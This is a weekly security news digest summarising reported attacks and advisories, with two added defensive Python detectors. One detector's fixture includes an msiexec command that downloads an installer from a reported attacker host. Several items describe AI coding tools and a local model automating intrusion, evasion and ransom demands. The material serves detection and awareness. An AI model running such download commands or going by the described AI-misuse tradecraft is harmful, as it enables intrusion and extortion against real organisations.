This is the week of autonomous AI, kind of. We have two reports of AI autonomously hacking and extorting based on what it found on the victims' systems.

On the APT front it's a week of China: the groups seem to be focusing on networking devices, so if you are lucky enough to have physical routing devices, you might want to triple-check that they are all patched up.

And advise your friends and family that not all e-mails that come from Google Classroom are pure gold; some might actually be scams.

1. Anthropic’s Claude AI Abused to “Vibe Hack” 17 Organisations

Anthropic’s August threat report reveals a “vibe hacking” campaign in which a criminal group leveraged the company's Claude Code LLM to fully automate reconnaissance, network intrusion, data theft, and customized extortion demands against 17 international organizations.

Key Details

  • Operator GTG-2002 used Claude Code to scan thousands of VPN endpoints and build API-driven reconnaissance frameworks.
  • The AI generated obfuscated Chisel tunneling tools and new TCP proxy code to evade Windows Defender, and improved anti-debugging.
  • Stolen data included personal records, healthcare files, financial information, and government credentials; ransom demands exceeded $500,000.
  • Claude Code calculated ransom amounts by analyzing exfiltrated financial data and produced HTML ransom notes embedded in the boot process.

Read more at Dark Reading, Anthropic, CSO Online


2. ESET Warns of First AI-Powered Ransomware “PromptLock” Using Local OpenAI Model

ESET researchers have identified PromptLock, a proof-of-concept ransomware that uses OpenAI’s open-weight gpt-oss:20b model via the Ollama API to generate and run malicious Lua scripts on victim machines in real time. By shifting script generation into a local AI model, PromptLock can vary its indicators of compromise and evade traditional signature-based defenses.

Key Details

  • Written in Go, with Windows and Linux variants uploaded to VirusTotal from the U.S.
  • Uses hard-coded prompts to instruct the LLM to enumerate files, exfiltrate data, and encrypt with SPECK 128-bit.
  • Data-destruction feature is defined but not yet active; ransom note is dynamically tailored by AI.
  • Encryption key and payment address are embedded in AI-generated scripts.

Next Steps

  • Monitor for local Ollama API endpoints and unusual LLM traffic.

Read more at Dark Reading


3. Google Warns of Widespread Salesforce Data Theft via Compromised Salesloft Drift OAuth Tokens

Google’s Threat Intelligence Group and Mandiant report that a financially motivated actor tracked as UNC6395 stole OAuth access and refresh tokens from the Salesloft Drift third-party app to exfiltrate large volumes of data from over 700 Salesforce customer instances. UNC6395 systematically queried Salesforce objects for secrets—like AWS keys and Snowflake tokens—then deleted query jobs to cover their tracks. Salesloft and Salesforce have revoked all Drift tokens and removed the app from AppExchange, urging customers to treat their Salesforce data as compromised.

Key Details

  • Attack window: August 8–18, 2025; over 700 Salesforce orgs potentially impacted.
  • Data stolen: AWS access keys (AKIA), passwords, Snowflake tokens, and other credentials.
  • Tradecraft: Automated SOQL queries, deletion of query jobs, use of Tor and cloud hosting IPs.
  • Remediation: All active OAuth tokens revoked; Drift removed from Salesforce AppExchange.

Next Steps

  • Rotate all Salesforce-stored credentials and API keys immediately.
  • Restrict Connected App scopes and enforce IP/login ranges for OAuth apps.

Read more at Google Cloud Blog, Salesloft Trust Center


4. Attackers Weaponize Velociraptor Forensic Tool to Tunnel C2 via VS Code

Researchers at Sophos uncovered threat actors using the open-source Velociraptor forensic tool to download and run Visual Studio Code with a built-in tunnel option for command-and-control access. By leveraging Windows msiexec and Cloudflare Workers as a staging ground, attackers minimized custom malware and embraced living-off-the-land tactics. This pattern signals a shift toward weaponizing legitimate incident-response software to establish stealthy footholds prior to ransomware or further compromise.

Key Details

  • msiexec pulled a Velociraptor MSI from files.qaubctgg.workers.dev
  • Velociraptor beaconed to C2 at velo.qaubctgg.workers.dev
  • Obfuscated PowerShell fetched code.exe and ran its tunnel feature
  • Attackers also staged Radmin and a Cloudflare tunneling tool

Next Steps

  • Monitor msiexec downloads from unapproved domains
  • Block unauthorized Velociraptor and code.exe installations
  • Audit for unexpected SSH-tunnel processes on endpoints

Read more at Sophos CTU Research, The Hacker News, Sophos Counter Threat Unit
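
One way to turn the msiexec and tunnel items in the Next Steps above into a detection, as an added example rather than Sophos's own rule: a Python check over process-creation command lines that flags msiexec installs from hosts outside an allowlist and VS Code started with its tunnel subcommand. The allowlist, function names and sample command lines are assumptions constructed for illustration; only the workers.dev host comes from the report above.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts approved for MSI installs in your environment (hypothetical value).
APPROVED_MSI_HOSTS = {"downloads.example.com"}
URL = re.compile(r"https?://[^\s\"']+", re.I)
CMD = re.compile(r'\s*(?:"([^"]+)"|(\S+))(.*)', re.S)  # image path, then arguments

def classify(cmdline):
    """Return alert strings for one process-creation command line."""
    m = CMD.match(cmdline)
    if not m:
        return []
    image = re.split(r"[\\/]", m.group(1) or m.group(2))[-1].lower()
    args = [a.strip('"').lower() for a in m.group(3).split()]
    alerts = []
    if image in ("msiexec", "msiexec.exe"):
        for url in URL.findall(m.group(3)):
            host = (urlparse(url).hostname or "").lower()
            if host not in APPROVED_MSI_HOSTS:
                alerts.append(f"msiexec install from unapproved host {host}")
    # Match the subcommand as a whole argument so file names containing "tunnel" pass.
    if image == "code.exe" and "tunnel" in args:
        alerts.append("VS Code started with tunnel subcommand")
    return alerts

def scan(events):
    """Return (index, alert) pairs for every flagged command line."""
    return [(i, a) for i, e in enumerate(events) for a in classify(e)]

# Constructed process-creation command lines; only the workers.dev host is from the page.
SAMPLE_EVENTS = [
    r"msiexec /q /i https://files.qaubctgg.workers.dev/sample.msi",
    r"msiexec.exe /i https://downloads.example.com/agent.msi /qn",
    r'"C:\Program Files\Microsoft VS Code\Code.exe" tunnel',
    r'"C:\Program Files\Microsoft VS Code\Code.exe" C:\src\tunnel.py',
]

if __name__ == "__main__":
    for idx, alert in scan(SAMPLE_EVENTS):
        print(idx, alert)
```

In practice the command lines would come from whatever process-creation telemetry you already collect, and developers who legitimately use VS Code tunnels need an exception list.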


5. CISA and Allies Release Guide to Thwart Chinese APT Campaigns in Critical Networks

CISA, NSA, FBI and 13 international partners published a 37-page advisory outlining how PRC-linked APT groups like Salt Typhoon exploit unpatched routers and firewalls to persist in telecom, government, transportation and military networks. The guide prioritizes patching known CVEs in Cisco, Palo Alto Networks and Ivanti products, hardening management planes, and coordinating threat-hunting to detect covert tunnels and on-box containers.

Key Details

  • Actors “live off the land,” using native ACL changes, packet captures and Cisco Guest Shell.
  • Major CVEs to remediate: CVE-2024-21887 (Ivanti), CVE-2024-3400 (PAN-OS), CVE-2023-20273/20198 and CVE-2018-0171 (Cisco IOS XE).
  • Co-authors include agencies from Australia, Canada, U.K., Germany, Japan, Italy, Poland and more.
  • Provides IOCs, YARA rules and MITRE ATT&CK/D3FEND mappings for proactive hunting.

Next Steps

  • Rapidly patch the five high-priority CVEs on edge devices.
  • Isolate device management plane and disable unused services.
  • Audit on-box containers for unauthorized artifacts.

Read more at CISA Advisory, Cybersecurity News


6. Supply Chain Attack on Nx Build System Leaks 2,349 Developer Credentials

On August 26, attackers published malicious versions of core Nx npm packages that embedded postinstall scripts to scan for and harvest 2,349 GitHub tokens, cloud credentials, and AI API keys. The breach exploited a misconfigured GitHub Actions pull_request_target workflow to gain elevated permissions and exfiltrate secrets into “s1ngularity-repository” repos under victim accounts.

Key Details

  • Affected Nx packages (versions 20.9.0–21.8.0, @nx/devkit, @nx/js, @nx/node, etc.) have been removed from npm.
  • Attackers abused a pull_request_target trigger allowing bash code injection via a crafted PR title on an outdated branch.
  • Postinstall scripts double-Base64 encoded stolen data and pushed it to public GitHub repos named “s1ngularity-repository*.”
  • Wiz and GitGuardian found 1,346 repos and 2,349 distinct secrets — 90% of GitHub tokens remained valid at discovery.

Next Steps

  • Revoke and rotate all GitHub, npm, cloud, and AI-tool credentials immediately.
  • Audit and lock down GitHub Actions workflows; replace pull_request_target with pull_request.
  • Inspect and clean up shell startup files (.bashrc, .zshrc) for unauthorized shutdown commands.

Read more at The Hacker News
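
The workflow audit from the Next Steps above, as an added example (not code from Nx or from the reports cited): a line-based Python check that flags pull_request_target triggers and attacker-controlled values, such as the PR title, expanded inside `run:` scripts. The function name and both sample workflows are constructed for illustration; the hardened sample passes the title through an environment variable so the shell never sees it as code.

```python
import re

# Context values an outside contributor controls; the PR title is the one named above.
UNTRUSTED = re.compile(
    r"\$\{\{\s*github\.(?:event\.pull_request\.(?:title|body|head\.ref)|head_ref)\s*\}\}")
RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:")

def audit_workflow(text):
    """Return (line_no, message) findings for one workflow file (line-based scan)."""
    lines = text.splitlines()
    privileged = any("pull_request_target" in l.split("#", 1)[0] for l in lines)
    msg = "pull_request_target: job gets base-repo token and secrets"
    findings = [(0, msg)] if privileged else []
    run_col = None  # column of the current `run:` key, None when outside a run block
    for no, line in enumerate(lines, 1):
        indent = len(line) - len(line.lstrip())
        if run_col is not None and line.strip() and indent <= run_col:
            run_col = None  # dedent: the shell script block has ended
        m = RUN_KEY.match(line)
        if m:
            run_col = len(m.group(1))
        if run_col is not None and UNTRUSTED.search(line):
            sev = "HIGH" if privileged else "MEDIUM"
            findings.append((no, f"{sev}: untrusted input expanded inside run script"))
    return findings

# Constructed samples, not the Nx workflow itself.
VULNERABLE = """\
on: pull_request_target
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "Checking ${{ github.event.pull_request.title }}"
"""
HARDENED = """\
on: pull_request
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          echo "Checking $PR_TITLE"
"""

if __name__ == "__main__":
    print(audit_workflow(VULNERABLE), audit_workflow(HARDENED))
```

Run it over every file under `.github/workflows/` on every branch, since the report above notes the injectable workflow lived on an outdated branch.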


7. Google Classroom Abused for 115,000 Phishing Emails Targeting 13,500 Organizations

Check Point uncovered a global phishing campaign that weaponized Google Classroom to distribute 115,000 malicious invitations over one week to 13,500 organizations across multiple sectors. By sending fake “virtual classroom” invites from a legitimate Google domain with irrelevant commercial offers and directing victims to contact attackers via WhatsApp, the campaign bypassed traditional email filters.

Key Details

  • Five attack waves sent between August 6–12, 2025.
  • Emails originated from no-reply@classroom.google.com to evade filters.
  • Lures included unrelated SEO services and product-reselling offers.
  • Recipients were instructed to move conversations to WhatsApp.

Read more at CSO Online


8. SSA Whistleblower: DOGE Placed 300M Americans’ SSN Data on Unsecured AWS Test Cloud

A whistleblower complaint from SSA Chief Data Officer Charles Borges alleges that Elon Musk’s Department of Government Efficiency (DOGE) copied the agency’s full NUMIDENT Social Security database—containing names, SSNs, birth data and family details for over 300 million Americans—into a test AWS environment that lacked mandated security controls or oversight. 

The move bypassed FISMA authorization-to-operate (ATO) procedures and may violate federal privacy and cybersecurity laws, exposing a single high-value data store to potential compromise. Security teams and CISOs should assume this data is at elevated risk until independent audit and containment are confirmed.

Key Details

  • DOGE staff obtained provisional ATO in July 2025, accepting “business need” over security risk.
  • NUMIDENT live copy moved outside SSA’s AWS-ACI ATO perimeter, with no independent logging or access tracking.
  • Risk Acceptance Request Form called the action “high risk,” but access was granted by CIO-level officials.
  • Potential legal violations include FISMA, the Privacy Act of 1974 and the Computer Fraud and Abuse Act.

Read more at CSO Online, FedScoop

